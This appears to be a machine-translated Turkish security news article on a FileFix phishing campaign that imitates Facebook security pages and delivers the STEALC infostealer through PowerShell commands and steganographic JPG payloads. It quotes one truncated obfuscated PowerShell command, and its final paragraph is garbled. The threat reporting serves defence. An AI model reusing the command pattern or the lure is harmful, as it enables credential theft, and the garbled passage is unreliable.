Sosyal mühendislik saldırılarında önemli bir evrimi temsil eden ve FileFix saldırı metodolojisinin kavram kanıtı gösterilerinin ötesinde ilk gerçek dünya uygulamasını sunan sofistike bir siber tehdit kampanyası ortaya çıktı.
Bu gelişmiş tehdit, görünüşte masum JPG görüntüleri içinde kötü niyetli yükleri gizlemek için steganografi tekniklerini kullanıyor ve sonuçta STEALC bilgi stealer’ı tehlikeye atılmış sistemlere sunuyor.
Saldırı kampanyası, kurbanları Windows Dosya Explorer adres çubukları aracılığıyla kötü niyetli PowerShell komutlarını yürütmek için kandırmak için HTML’deki dosya yükleme işlevlerini kullanarak geleneksel ClickFix metodolojilerinden önemli bir ayrılmayı temsil ediyor.
Terminal erişimine dayanan geleneksel yaklaşımların aksine, bu dosya varyantı daha evrensel olarak erişilebilir dosya yükleme arabirimini hedefler ve potansiyel olarak komut satırı arabirimlerini açamayan kullanıcılara genişletir.
.webp)
Bu kampanyanın arkasındaki tehdit aktörleri, Facebook güvenlik sayfalarını Arap, Rus, Hintçe, Japon, Lehçe, Almanca, İspanyol, Fransızca, Malay ve Urdu da dahil olmak üzere 16 dilde taklit eden çok dilli bir kimlik avı altyapısı geliştirmeye önemli kaynaklar yatırdı.
Sofistike sosyal mühendislik bahanesi, kurbanları yakın hesap askıya alma konusunda uyarır ve onları saldırı vektörü olarak hizmet eden fabrikasyonlu bir dosya yolu aracılığıyla iddia edilen bir olay raporuna erişmeye çağırır.
.webp)
Kimlik avı sitesi bir meta yardım destek sayfasının görünümünü taklit eder (kaynak – akronis)
Acronis araştırmacıları, bu kampanyayı Temmuz 2025’te araştırmacı Bay D0X tarafından geliştirilen orijinal kavram kanıtıdan önemli ölçüde sapan FileFix metodolojisinin ilk sofistike uygulaması olarak tanımladılar.
Saldırı, bu tehdit kategorisinde kaçınma teknikleri için yeni standartlar belirleyen çoklu gizleme katmanları, anti-analiz mekanizmaları ve karmaşık bir çok aşamalı yük dağıtım sistemi içeren dikkate değer teknik karmaşıklık göstermektedir.
Kampanyanın küresel erişimi, ABD, Bangladeş, Filipinler, Tunus, Nepal, Dominik Cumhuriyeti, Sırbistan, Peru, Çin ve Almanya dahil olmak üzere birçok ülkeden gelen Virustotal başvurularla kanıtlanmıştır.
Steganografik yük gizleme ve çok aşamalı yürütme
Saldırının en yenilikçi yönü, hem ikinci aşamalı PowerShell komut dosyalarını hem de pastoral sahneler içeren yapay olarak üretilen peyzaj görüntülerine şifreli yürütülebilir yükleri gömmek için steganografinin sofistike kullanımında yatmaktadır.
Bitbucket gibi meşru platformlarda barındırılan bu JPG dosyaları, dikkatle düzenlenmiş bir işlemle çıkarılan ve yürütülen belirli bayt endekslerinde kötü amaçlı kod içerir.
İlk PowerShell yükü, kapsamlı gizleme teknikleri kullanır, komutları değişkenlere ayırır ve desen tabanlı algılama sistemlerinden kaçınmak için Base64 kodlama kullanır.
Komut yapısı gelişmiş kaçırma yeteneklerini gösterir:-
PowerShell -noP -W H -ep Bypass -C "$if=[System.IO.File];$ifr=$if::ReadAllBytes;$ifw=$if::WriteAllBytes;$e=[System.Text.Encoding]::UTF8..."Yasalar yürütüldüğünde, yük steganografik görüntüyü kurbanın geçici dizinine indirir ve gömülü ikinci aşamalı komut dosyasını dosya yapısı içindeki önceden belirlenmiş bayt aralıklarından çıkarır.
Bu ikincil komut dosyası, sonuçta sanal makine algılama özellikleri ve dize şifreleme mekanizmaları ile donatılmış GO tabanlı bir yükleyiciyi dağıtan gizli yürütülebilir yükü işlemek için RC4 şifre çözme ve GZIP dekompresyon işlevlerini uygular.
Nihai yük, tarayıcı kimlik bilgileri, kripto para birimi cüzdanları, mesajlaşma uygulamaları, oyun platformları, VPN konfigürasyonları ve bulut hizmeti kimlik bilgilerini Chrome, Firefox, telgraf, uyumsuzluk, çeşitli kriptourans cüzdanları ve aws/miras -valfik veri erişim için bulut hizmeti verilenler sunan STEALC kötü amaçlı yazılımlar sunar.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free